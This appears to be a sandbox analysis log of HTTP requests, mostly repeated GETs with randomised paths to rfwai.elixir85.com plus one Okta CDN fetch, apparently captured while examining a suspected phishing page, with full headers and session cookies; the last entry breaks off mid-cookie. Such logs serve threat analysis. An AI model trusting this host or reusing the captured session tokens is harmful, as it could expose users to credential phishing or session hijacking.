          Source: global trafficHTTP traffic detected: GET /fs/bcg/4/gfsh9pi7jcWKJKMAs1t7 HTTP/1.1Host: ok4static.oktacdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /uvxQtGj3CZl2NHEVqVIl3gDjBSop26aE86MZBefBLzm512128 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /ophQfOAKqa13061H23eI96MwQ1iF0kZmnaRI3dvE34mhKSmU3i9C67140 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /kliHDnAE0gTkmBMJlvBgKdx2UgHYVMjMpYKl2bzij6kYptmsP7Qz5ArvdibzdrlKBVuv220 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /ijBHzsqcIkRtTjbxMugPeR81zw0x5yUVlfNjXopYiBinvvsl7gMzOUKramHNI6Cfhnab228 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /mnn8U5yVMoEYzlOfgNnAivXZ1CIQzlLocVuvEshLSY4IQMWWAxbx90145 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlVubklVOFVmbTFQZEcrME9vWmlYVkE9PSIsInZhbHVlIjoiTW8zZVZpWWdQV3JtOFhRM1RqZytMRUFRWWtqNWF0UEZMTDFmUVlXTjhnMWlUc2lGMXdxZFZPMnhXT1BkR29meWNzK1R2eXdtWm52UmNFKzJscU9nR2labU91ZU5JQUZuYXBEejgwK2pCb2NyY0dVSlVEb25UMHN1MlBBd0p2dTQiLCJtYWMiOiJhMTcyZTQ3ZWNiYmFmNzIyMGJmNDRjYTk4OWEyZjQzMmViYTVkMTZhZmNkNGE4ZWE0OWM2Y2QzMDZjMmMxN2EyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im04ck5QR08xUmVCSEVyOEdVNnI2U3c9PSIsInZhbHVlIjoiaGZBQW54NnRUNXdjcUhjM1BTdStSbU0yVURBa0NEaUN2dytucWE1SFhNRGswaUhCRG92bEpRSzV0Q3cwNzZyRmhveFN1d055SG1KNUo0K0JDdjNBNVZzUHhDMnBEQVBsTms1NVhjaVdBZGlRYVczc2hOSHpUTkloUnBwaS8zYkUiLCJtYWMiOiI0MGY2MTZmZmQ5OTZjNzdlMDIwODg4NDhlMzhjM2IzYmUzOTU3NDg5Y2I4YjgxZWJkNzJkY2M3ZDFiY2M3NzM1IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /ijg96tfwHavl6dODlGNgwxFtzlAssOTwlMZqK1Qg56170 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /yoCRQfrZ0iVvPSQxT7vvEGN44mzSHgJf035E0VZBImhSjl HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /yzRdfjjshRC3IrYk8A7PQOd9IO3rsWR2oi1eXvnzkPxuZab180 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /rs3DhQgZj5jQkQBct28ombhTCAHmieGU0ouxgh9zt47ITiP0AvmihR1tBef200 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /ijW6ax7zUB7JKxnxsqoYba3bEJXUHkaugjRSkLLb83klpSwyDyWXfGqe6G7wTrPhUrnsIYwrzp12209 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /uvxQtGj3CZl2NHEVqVIl3gDjBSop26aE86MZBefBLzm512128 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /op8n0GHVANMlpH3sUTok8VHPTN8s9ObpAxHGstCocx0HifJbSyvtSDKzk5ywfdcd232 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://rfwai.elixir85.com/188360859051247984209ISEMAEXOUROIUPGWHX?9377770014860499179375zgciqmroynnkxewjkliwAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /ophQfOAKqa13061H23eI96MwQ1iF0kZmnaRI3dvE34mhKSmU3i9C67140 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjhxVWFJL3o0TzhOVTBQRGhYbmJyNFE9PSIsInZhbHVlIjoiVmxzNk5CRUpWWGVmVU1LNjdjZlBLa08vRG9rV0RpcFdIYjA5V2gyOTBDRk1ESXVyOE5HNkZSakd3SFNkZFI5ZlN6SWFYY2ZONlkxRG5GaFFoVFpxL0JBNDZ2KzdyT1UrSG4ybDA0SC8wWkJQNmMyRUkyK3B2MExLNWtqNVVVTzgiLCJtYWMiOiJiYjc1M2FmYjY2ZWI3ZDE5MGYzOGMyMzg3N2U0N2Y2N2YxYzBjYTU3Y2VjYTNhOTlmOGQwYWMzMDEwNzNjNmU2IiwidGFnIjoiIn0%3D
          Source: global trafficHTTP traffic detected: GET /mnn8U5yVMoEYzlOfgNnAivXZ1CIQzlLocVuvEshLSY4IQMWWAxbx90145 HTTP/1.1Host: rfwai.elixir85.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InhkSUx6a1lBejBpUEdEand6eXJMT2c9PSIsInZhbHVlIjoidFBGeHdZRzQ4cFZYK1RzMlMzRFVmc0NsRWdaVHlONEQ3ZFFnTWNEdDI3MnpONTZ2ajFoYlFYQVBDWkN1dGRpa21pSVNzK0YzMkFDRmJUWVJub2Y4b0pQd2g5bm9HNVJxdENVQVQ2ZXRKNGZKSkxURC82b3BwTlYzSzlkUFIrcy8iLCJtYWMiOiJhNjY2OTIzN2EwY2FmOGM0ZTQxMzIzNmY2ZTA3NzY5ZWJmN2I1MzhlMzhiOTZlMGZjN2UyYzRhNTBkN2M4YTcxIiwidGFnIjoiIn0%3D; 